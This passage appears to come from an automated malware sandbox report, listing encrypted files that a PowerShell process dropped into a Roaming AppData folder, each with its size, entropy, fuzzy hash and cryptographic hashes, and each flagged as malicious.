                                                                                            SHA-512:6EF6781DAC7510E5D73202EA3BB754B54595388E421A077EEFDDE0647E6387D68EE9DE88929B7F993F92D5CB6B474225F4977940FC2A15FC27BAC68888F19122
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\KlwmIpaSTYyehqr.hPOZxTsGbfiX
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):129096
                                                                                            Entropy (8bit):7.998330756061086
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:frD3Fnlx0csLCMz/xsksRxHveO/0B2wfoy+CuTY1:frD3aLJmXveO/0MsNuw
                                                                                            MD5:BED83A40E23F5FE93DD8DA9E38070310
                                                                                            SHA1:C3F3A6E0DAB2E8D1E1309E8708B593647A2CCF9F
                                                                                            SHA-256:25AFE5BC9BEA9C2DBA1910745AFF1D811B30A9513B0DBAAB02D98A72ABEB4198
                                                                                            SHA-512:16CCF7BA4A6D15F2EA9E4EF967DE0DDFE73536D3D52D544F2730438E1BB455BD107D8AFF7A8A645092B9E856B16155CD2B688EA3C2C1BCB7D4B132834B36A2E4
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\KwrkAqLXNRpPWEaic.cInVZjfmQkhePG
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):123958
                                                                                            Entropy (8bit):7.998565364880759
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:PdItj7hLKbmxBi9TMagLwVjlHj7wRmXK0MwrIh5y/96KE6Yj:PKhcXMunYP0drCyIK9Yj
                                                                                            MD5:CC5B7C6C0370DAF5E06DAAB8F94BE9E6
                                                                                            SHA1:8C64C3347D26DBC328602923B5233F8F95D37E0B
                                                                                            SHA-256:050119C703119526030CA78622CD053157D7ABFFAA4D8AE7EC0B4E2FC0D15B0F
                                                                                            SHA-512:23535B1CE32E58E2E230DCC73B1058DFE2BD41ACC8D4BFDFBCF48B8BE661D32368708B41FF34148B89E405698F8DADDA2759B4FC1394E8090E3A8DB6355E5143
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\MRNJVswYOBZSUrvGz.nZMvFOCfHi
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):157089
                                                                                            Entropy (8bit):7.99904685562989
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:gXTbtarnNq0k+3v/4ZPngMwpA4TVPI9KiCEln2xlDj+l1TIgrE2ddB:QTbta1dHSg5AE0dl2T+lxIWddB
                                                                                            MD5:9A3CD28929193C49A6CEF5B4BB0E4A15
                                                                                            SHA1:DE02AFA0BE97D61BE2F9B421EC6CFEB6BE05CE19
                                                                                            SHA-256:6F9F907E2B2802FE1EC2AB34D119B8B60587537224DE05366AEBB633E2F3A99C
                                                                                            SHA-512:A1FB924073922088756899D47113B105D859F97BFD95D90B8F9E213ACD61B8E2917200F9D015B5F75BB763B146DD24944FE7BB7264704E12312FC538E15D54B1
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\McUgHjwPpkTros.FiVAMbepdtvDT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):178720
                                                                                            Entropy (8bit):7.998759197450374
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:QUp3a5OG4/jo7MDEUAnfMygcgDJmiKB3ruPDWLjsYYFVjPLsqP:q50/AMIUOfptgDciyKPaL4VYO
                                                                                            MD5:B8FDE73B2B4CFA32A54AD319E48E8A0C
                                                                                            SHA1:267959B70C4342AB0FC4A5F6B5E5B19068991C95
                                                                                            SHA-256:C042DE7BDD1588C2E3A55B48E9DB58F8902A81AEB37128A71E698B0B4D8B0958
                                                                                            SHA-512:BE3F4CFED6965E84C7BD78E70424208DFCD922F9AEBF1DD6278E35190EE6156AE4322118509EDC1460AE6A779FC492BFF460965913D04E563601DD96A24A6B0C
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\MisYlNcbAgIjX.zNaCVgrfLoH
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):169148
                                                                                            Entropy (8bit):7.999005464721027
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:uC6V6h1AE74VN7NHWA9S8ikZOCeCr8dFF+VYowq5oH00eDT9fO2Uj5:bO+1X74V90A95iCOCn8H4VYoB5oH00wM
                                                                                            MD5:AE8C4033F0AE7AE1D47987B5BC023419
                                                                                            SHA1:375842CC23D18BAFC9F3737DFAD01EE68A76DE5E
                                                                                            SHA-256:37BC8AE4B9AF24B1548B4D762EE2456D2779B5270EF34A63A1B1F914603D7935
                                                                                            SHA-512:F31C7E333E28A9C4048A1BD92410DC314B37B10DD8980715C342E66CF6157FFFB7788B05B94E7886518BDB084B4174DBD33778DF426EC0A2E7AF365DD064A3A7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\NMREBxycaFdrlbuOGUk.DbeWJYKnNLBmy
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):158637
                                                                                            Entropy (8bit):7.9989074698257525
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:sy1/ooVJD+Db4ZEAes+4H4qrwUAfKKZ4NNiBrDgJAYJq+v:syVFJOb4ZEX6wuCoKrDHYJNv
                                                                                            MD5:F8636373D73D2C55DD17B2AE65DDB50A
                                                                                            SHA1:96CABD5CF663A962F1D657B0BE427113F8854A98
                                                                                            SHA-256:4CA9D024056D98FCCB273FA27557CCDD8196692351131C41039137B6E8A0AADB
                                                                                            SHA-512:01312BD1B32CBD5B0474D5DE6809719CC170297D3DBAD5B5F42F2F6D1CA9557D81A45E1AC0C1B95D83E77A3F2BED66864FC479BFE02E918DB502C8BFDD7D1A37
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\NSTBOEHtRMVxUwzdC.eUitPRVkDsJE
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):98622
                                                                                            Entropy (8bit):7.998379920126077
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:ygtvFs2THvfhk+RO3rWR/iSGyMEFVSq8t9WC/vH/uLgo90sCxG:ZtvrvfhErWRKziSpt9WKI0FxG
                                                                                            MD5:A25B81CE74779DA1409A274879F77AF7
                                                                                            SHA1:C995A39AF9A24BC69B57A214A9F374D8BE8706EE
                                                                                            SHA-256:49A8669005B6823C2626FAD09A81CEFE3329F45EEF389168A9D3678DA8A276C0
                                                                                            SHA-512:8AA6B815DC617BBEB27EC8ECCC441440532C8E57E8C1DD9C504E71E952510CB8CAA18DB2F5219F9F846432BA9283D3A5D6B97B0D3E04507C1FF04F957DBF7864
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OKVaIsnDYSru.wRkYivJdPtFmOBqUgE
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):52302
                                                                                            Entropy (8bit):7.996123944088648
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:SlxOSVWcXGVLeCAULWzgsxrGNJO1UgVvTUIdYz2Rp+KupcRUJ/cPvcq4kr:aOYMLFM8RJ+bVvTUh6ttW/cncq4k
                                                                                            MD5:91A6DFC6B979730E47B5CE23A2BC4A44
                                                                                            SHA1:6987011046689CCD25B9F9C2A9F7BE529B202885
                                                                                            SHA-256:D10E6E70B386E3010F590F078C2DFC44047B2ED42F2DC5A6CA0A42A5EA66028C
                                                                                            SHA-512:DDA666632D4742F2D12A7EF9120037791744B1293B5FA53056E4BCA72755456EB2E917A015BD8989C4CF3879DBC5B545B257CC66F769C2FC1591671B3A67CDC0
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OMNSVpazArFDcgyd.UOYuHkRgaSNFJojlxev
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):132169
                                                                                            Entropy (8bit):7.9984277169087505
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:iEwmiS7cOxuW2Vs/Dt89Vg9FVaq6iElgfhPVY5b7YgLPCZOB70VuFBSziY1fTEJY:iERTLxWwDtag9FV2PjrOu/yTEJ55Vfyj
                                                                                            MD5:2995F00403588F855AF5ED7E4B79C1D8
                                                                                            SHA1:A62915184EE4A857E29C39A992F51C776017A827
                                                                                            SHA-256:029F5E8E33D9B5702ABF71BB10A0C4468C882CAD012CAB573381390ADF7283D0
                                                                                            SHA-512:82DD45AC38D63E631ADFB161A74953F18CFDC5DA3AFA6A9779EDF4B830C19557F57A0B7BEE530789A66F9766E200644CC4A99A5D1D33BAD5C54AABFA950995E4
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OWbwoVzjxLNB.IjCdUZyGoOJmRuXAbt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):80241
                                                                                            Entropy (8bit):7.99777290932236
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:XtMyG+67Q7z8X9rh3vpf2zMLBmtZTk9SRTj1r7HptYvRxNhcMp+J:6yz67qzK9NvxmMu+9SRH1/HQvVC++J
                                                                                            MD5:49CE78333D7CC1C59D042E8478C5826B
                                                                                            SHA1:F5BBE7A30B4D0E2718E9B7DAC52638343B4F0A0D
                                                                                            SHA-256:8B2FDA14CB682620DDEC5BF32C8B32AA5D785E2292750AEE8CF8196EBA274422
                                                                                            SHA-512:B94AAF72BD6EC22436F33A6834FC78B5250758B148F1FCE54F57BA259CB42FCD8E8D5B22EB0C79867B96381C9CA62120AC1D1F961B9A890E30ABDA0FA9FD5794
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QSGbAcBYTIxyp.XuYMCakdHx
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):51837
                                                                                            Entropy (8bit):7.996496691894263
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:QVf06NnJDa64xylhJLQxh8S0V36j2oLTC3SjN73M:QVPNJDx4xqr+eS0VKj2+CSj58
                                                                                            MD5:5F48DD05DCA254253FD474BAF42341DA
                                                                                            SHA1:42D4F0D1EF756F14157FFE5EE175CE74A1F43AD5
                                                                                            SHA-256:7BD45D0D50941E42AB8202E99F3C4165536E797DB5BF643C99BBC57E1A13B6E6
                                                                                            SHA-512:4D4E4E2D366ABB7D3ADB39E543274DFC01304B95578D518CD10A11D505606EB9C6FE417AD70671D2A7F07424C61E955CA8F189FCDDA07ED2C4BC681182555C78
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QWxiIaLeDJzmp.bXhgzQZDBsjdVLyaIOT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):75290
                                                                                            Entropy (8bit):7.997309833699159
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:bYx7+oy5Ifs5QFO4CroNlTMSmYr0nTrYFi18Ed/k1cr2:M73yyq0OGT26F68Ed/+
                                                                                            MD5:2E010619A8556C0F799EB4CDD25834D6
                                                                                            SHA1:79EC088A3408C07E6299A16948B5F76E72EAB1F1
                                                                                            SHA-256:EBC91C74709DDD3E20E04AAD1A2303AE0FC71F9267E22788F3A246B969108530
                                                                                            SHA-512:DFE03F71A88D794EA261F09C679064FFB42DEA3C5B5EC40996FA4C8AC8CFEFE26CB663C4141C10891F859806C464E378718D5B6BE521D467F98AAE92D9301128
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QpJOjRaPitKZ.PtKJpRLHWn
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):198985
                                                                                            Entropy (8bit):7.999190369174077
                                                                                            Encrypted:true
                                                                                            SSDEEP:6144:MKSSYG8tYl2MigCxrmRKYgjxJdhIF2v+b04cbiQd:0XPnx6RANhpv004Ls
                                                                                            MD5:CD073ECCA9AA4B4D64695F68E123DD80
                                                                                            SHA1:F540C248E9510DED892AFBB470155E5309A0513A
                                                                                            SHA-256:9EE667E41D37B6F31201A2E12468FABAB31715C621A83ACC742B369855738CBB
                                                                                            SHA-512:009EEF81C6E6AD55A00B734B21E3DE50132B03D1069794090745B1695D25F4E921416A3C992B9E1C3A2356E2C33AF69E324BA0F71BBB0BB27A49376AF099A6C6
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QzlyLWCNAPcGtTgHxr.qWXzuIgseixTtYcdarV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:COM executable for DOS
                                                                                            Category:dropped
                                                                                            Size (bytes):99437
                                                                                            Entropy (8bit):7.9979710008705815
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:Mmy+WED+rV/AwuakxiRM3hNMVAiKGQmoQDAGXDqA2a8vWZ9kMUiKNnm/arnGJf:Mx+RxxiRMR0ANnQ7DyaZ9kMUiKRmSr2
                                                                                            MD5:622E5BF93E7C343A7E3919887EC5F9FC
                                                                                            SHA1:E1DF4AED97229B5704407A07C700DE9DBD32B685
                                                                                            SHA-256:25D21EDCF36B1BEED4FB118A33AC91600C52888254A86A9399D4E5A342DDB87E
                                                                                            SHA-512:F400CACABAA95D1DC1A016B73DBA464749293E811EE1CDC1D6957BEFFFDD93E2FB491C7A6BB9AC069E03247700314277E9C2667EF18BA8DD564C24B5A6F60CDE
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\RNcZQGstayolJSYCBxE.VhPGSvfcFzHuXrnW
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):86904
                                                                                            Entropy (8bit):7.997372640023325
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:9TkG16jOeTi2qsAyKhoTuuUQQ3ik9re29i70PU9BT1WnyhVTLsPD1/pDFvX30V34:9ozqs6oTuuUQhk9xc70c9B1ZIFfX3Ued
                                                                                            MD5:234B359A5B629FFF7C4FF9A6A0A8DA5B
                                                                                            SHA1:01E37879DC07520D9E4EE7EBB6F3B3E8CD62AE8C
                                                                                            SHA-256:7B8C6054ADBB632859352493EB4E909F2AF37631684A05121118EB89AF42E91F
                                                                                            SHA-512:6C5B8609B6A510D24BAC8B11BDBFA412EF3642ADC71027CA39A7971D3861F0FD865F88F505EFAFB5EADAFCFEA767815F9C7E226F43AFB16F50DEDA0EBF6899D9
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\SMUFCxligOrHNwktv.gnvGhdpoQZiTuaYkCHV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):74687
                                                                                            Entropy (8bit):7.997583115152667
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:4jEetKqrTzNhICp9zbcS4IFEv4TwhyGWpZtDh7wjLhs5mKGS8cYL:4jfjrzTpFbcSdFEvPPI1h41KkcYL
                                                                                            MD5:C4C3D5D25EA7F2A6004519229120FF24
                                                                                            SHA1:519350B420668E331741523D3AE7B77CC9179AE5
                                                                                            SHA-256:92FBED28641435F6BEA9549DF377E0FBF3277D062EFACF69BA0B4CBCCC33F800
                                                                                            SHA-512:F2CB58ECCF9633EF4C590FDF9EDDC721BD03071577346CDAD65B718C67507307EF28B8DF0DB7E046C6A70117FE52A8427733DCDCB1D0621F36BA270D6C0F66E9
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\SpoqdPasHmF.qLfZsOXHPMDmUA
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):135055
                                                                                            Entropy (8bit):7.998477015445849
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:hQCfChvQacwrPSun7C/2Q39FB9x7Qcmv2mJgeAxH2:h5aYqSue/VDqOjxH2
                                                                                            MD5:1F4F929B1B4F690C4F15F45E5327AD03
                                                                                            SHA1:4DE1880B092BF141C43CB20677499F63907D3178
                                                                                            SHA-256:71B1C2B4282CD08032FFB0863E89D763C4EDB17B2EF2F8203D961985C95C86E7
                                                                                            SHA-512:58C34829C53C0058B354B378E10701B0C04AD3D95F21866F10144A06C8F58F1A975548D9B00E9DB9B42DB60848910328B910F506B5E70482A7DFF9B9A43705FA
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\UAnjRPwBSVcJvoyZOh.FOqQEDdkfmpu
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):174780
                                                                                            Entropy (8bit):7.998904439002782
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:vZqOPKgXjZDLi6OQudVzM2isEufqcqsHsFpDKF1eTmt2E5mxZuyyvL:vZq0XjZPOQudBM2i7VsMbbmt2EaRk
                                                                                            MD5:A5B6CEDE0269755AB5AA016837149129
                                                                                            SHA1:E123156C608FDB43DE9F327262A331975FAED56E
                                                                                            SHA-256:C9D8922611393E47736D23F019C7B1BBDEE95BEBBB75E12AD679E955535DEC95
                                                                                            SHA-512:117FCBC47162BAAC61B11FEA0F72ED4BB155A7EF51F2721C5C054C240EA3B61CAE0B3400B37BCC247E22DA4FBD32B0068DE456B678F1F2DF6CC8E6529DF45D83
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VDWdfjnwIM.QtgAySoCKculLD
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64364
                                                                                            Entropy (8bit):7.9973990079335655
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:0DiVVorvhxbZTpOnWR1sSVq/3MMDzAYbt4:0oorJpB1sSg3X3Zbt4
                                                                                            MD5:829D85342B2C71236FF31D02B443C3F9
                                                                                            SHA1:C78541609B9B2AF8DE8EC0034F3F80B3D56BABA4
                                                                                            SHA-256:E02F1CEE8A0DB601A16E9B837ACBEC5C05597A21ABFE6C5287F423926ADE6C1D
                                                                                            SHA-512:F0A7A3107FB915687A9CF0C52806EC391B9611B25E41F2B3FAFFE1F3F380970BC50972B4143B23EAE2EDCC13BAAEF08A5150C471CE6BA4014A9CB3904F962DD1
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VTeCclXuGgiqHBty.gVkwyjzbJWDF
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):106734
                                                                                            Entropy (8bit):7.99823102431348
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:HXrENP1ZbAG9mq7Z/6BvS6USYW9o/wfL4Vd4swlGaG7+pDg3qfbM7i:7ENPsD0SQq9o4Dud4J54+F
                                                                                            MD5:7893824A7CBACE5A3EA53DF93F03CE7D
                                                                                            SHA1:F9CBA63D3911617ACCC3704EE809B6677D8E74C1
                                                                                            SHA-256:E6BFFE8A8DF50CF57B6BDF5612921F64F9D6A9D447F6FA1393789C757AED49D5
                                                                                            SHA-512:B92A7466AB829453AA53986D2CDED8593A565E2CCD170E297773149CD21154A1BA9BCAE55CE1C219725784939725A8B896A46C0B6FA0FBBC574639B622785F0E
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VaRltDUbPMkAJw.kSNCiwQBaoM
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):135856
                                                                                            Entropy (8bit):7.99866082753375
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:tl1cpnHAHpUwBuR66iqbYuzUq4SXXtmctnweq0DZZc8rUOpvj:0wSiHfq4KtmCno0DZGiUOpvj
                                                                                            MD5:B9AB5EE9C1F27FCA73A29920001ECDF3
                                                                                            SHA1:93A4E96B3A2AF543384D776A8ABB7F7878C32D7D
                                                                                            SHA-256:A04C3DE6A9416A40FE3C8DD143D8C9B5DED93915813426A16A56632E2E4A2BC9
                                                                                            SHA-512:00C6BEF2E258C2C30C842E86DD8D3C9E31C1D4F82D2A5DD55EA2DB43C7E9E55F97D02FDDFBB47F54F02BA1B8D729BE2E4914A98CB66682E1E59BFF817B20050D
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\WGTRFqeaJP.ibaGvCehnSkqQI
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):86708
                                                                                            Entropy (8bit):7.997957423000446
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:EwniOs8UZwq1oczLYBoKt+m0bSl7K++FJSFqdAVd+/7Mgj41f95x6ySdam3:EwnFJUxvz0uKj2un+HAFF5UyGH
                                                                                            MD5:7DDE22EC9B4DE4B5C75CDF60DAC5F635
                                                                                            SHA1:A9F0659209CC811D1744B9CDCEDEE40E1920D800
                                                                                            SHA-256:C39704CE4DEF2C306FF80F373E255E8056B9137CB34ED75CF29D84D4AE083430
                                                                                            SHA-512:72E2A3224240E0BAFC4B42921C56ED2E27C9119D15B9458B4499575A2FA67F8D8F62EE4700B7E2B46A21FF1C49C9F4412EF312AFC06195C52DED8980344B4B78
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\XfhvNpPxsGnYwEj.KsfSpNicARGJODo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165553
                                                                                            Entropy (8bit):7.998912086610298
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:ZwgEEJi8rYHDanRjXQvcoJwPLzBn2PIz98e/fxiof7Cf2Bil7j+Biawh739OcrGt:eg5qHMjYJwR2lcfxze2Ql7j+BiawR0
                                                                                            MD5:CF34269A90CDF0D1BBAB5B55DFC5F6B5
                                                                                            SHA1:5A26D70FBEA9D72D186DA3BAF14A605EDC2EC800
                                                                                            SHA-256:49B91F2AB2502A2E3AB8808DE145ECE67569043504706D32250B12156EC45FDC
                                                                                            SHA-512:EAE8AC5A45175324E8AB2E3CAB962DD6E133BECE24AAF36E309823C32AAEFE3EAA5AA72ADCCBADBC79AA86BD35E7E50D4682642B6B96CBACB6E5CA95D9CB02FC
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\XjDcKESNRldofOIr.IBHmlCxheODv
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):96431
                                                                                            Entropy (8bit):7.997956940540266
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:9KnopMJfuEeGCPj5SUXxJIcQehW1ZW2qacJzk9FVDkcg8P//46wjrg+xp6vdg:4BLeGoUUJIcQe0ZW25chkRkcx3/41XgI
                                                                                            MD5:D0A395054D52A0D67B586DA1A09D06E4
                                                                                            SHA1:67A3F02999C0C094EDDE72803493BF92720F9462
                                                                                            SHA-256:16D58D03B29C04921CA03F40E0EB17C58B1DA87F4C486B593410103A3F3D8883
                                                                                            SHA-512:19FED4C3A2B02D2F04E4ADF64985DF7C1C956953B4E544775ABDFF03DA10750088F048D3B2607400AA3D52E5D2D1391E9B1CAFE34E6E7048223C655C6C3E0B70
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\YNTcqzPgVesCmlJHUdr.DOsNBcQkFwW
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):194306
                                                                                            Entropy (8bit):7.999116472827157
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:FNTHAEKxW9cKGCRBIM87ytuBwd5SBs6mXDJp8PWasz9g0IICV8hNLaMvRj:FNkfW9TjI1Otucm8DJp8PJs/3o8hNLjl
                                                                                            MD5:BD77872716E6765366B4E151306FB97D
                                                                                            SHA1:E18AC5B1188F14B9CFE2E452B3283F34CB23B5D5
                                                                                            SHA-256:26D2A98A2E8A720C00D2A4C7FD375B450C92A8CA730266A42C62EBC34C96CB67
                                                                                            SHA-512:D6F0CA11A7BB9B20A2044E0AC0A6689C7B9088AFFEC5579B8E2CC384007DB03891D77F87BA0E2E80FD0B33A16A7AAF4ED543F15117A69F01FA6F71A3CB765A00
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\alkiEOVhjq.QklCoYcFqu
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):108044
                                                                                            Entropy (8bit):7.998245796083788
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:5HcxWf4SghzXl0oUMNPCY4MlUmhxynl0zw:5X7ghzXlboMlUmKl4w
                                                                                            MD5:CF8791CF2AA8F62CE26141B68C3E3BDD
                                                                                            SHA1:160089F07AD439836621ABCD85AF0630DDE78427
                                                                                            SHA-256:5453A2D29D92D4AA1BFBA813F9FD71B6A060BAC818E1963432820D03552BC53B
                                                                                            SHA-512:A9FBF181CAD855F54ABC24D4AEC56D16619917BA50C6457DC32D82D7B6E0098E52226109C83DD4956A503733DE09D6F262597D80718DC6A6945DE3451E5AA4BA
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bDZLNaQSRephwkgE.bzmDpAKEtnYiw
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):118614
                                                                                            Entropy (8bit):7.9985600743241125
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:b3Qw0joMXj3tY5kx89+lIowA1BaozuQelkWAgk2Eeb:b3QxMz5m/lUWBaodUk2Eeb
                                                                                            MD5:7F0056093FB606B600536E25F534707F
                                                                                            SHA1:EFAD0627E74D987BD6D9611872A7FDB999D9237D
                                                                                            SHA-256:88EEEB283AEE809BBD13D7DABB94A08243E72AE5978BD14159C74E6BA700551E
                                                                                            SHA-512:A636D6868937E0F8EA8E04C5A884AA6BDE241E4DE2E561B46A52ABD0621DC8F9D8CD7AE54B8A23EA6F624F1F39DE052BD2EB85978AA6193A7CBD5C9E873EA534
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bOGjhazSdBHTmZPLYvo.gYwXFeuJSZVbQN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):117677
                                                                                            Entropy (8bit):7.998253010721276
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:eifB3JTg/4ebTwW5e/jxJsmw0ebJ4V1t2S+ipAbPb:dJs38JjxJsmw0el4hvM
                                                                                            MD5:A5B3CBCF135B14C223887524D170E715
                                                                                            SHA1:02A6850C52B5005541B62FC8A1CEBDF329BB6EA0
                                                                                            SHA-256:9902E84E7EC0AC0BF503844D9BBC609D43BF8C6EFA8128C7AB12F83195391F3A
                                                                                            SHA-512:747107CBD052C2AFC1CB818811A5D9C4B434AF4E82BB058F9FD73E47689166E2052CF9FFAD893729CE1D1E73DEA043AFDB7C7B2372AD2C86E73E37D3C46D58CE
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bkcEOMPgNlCfo.hHZWmwSbiN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):76809
                                                                                            Entropy (8bit):7.9976309842610815
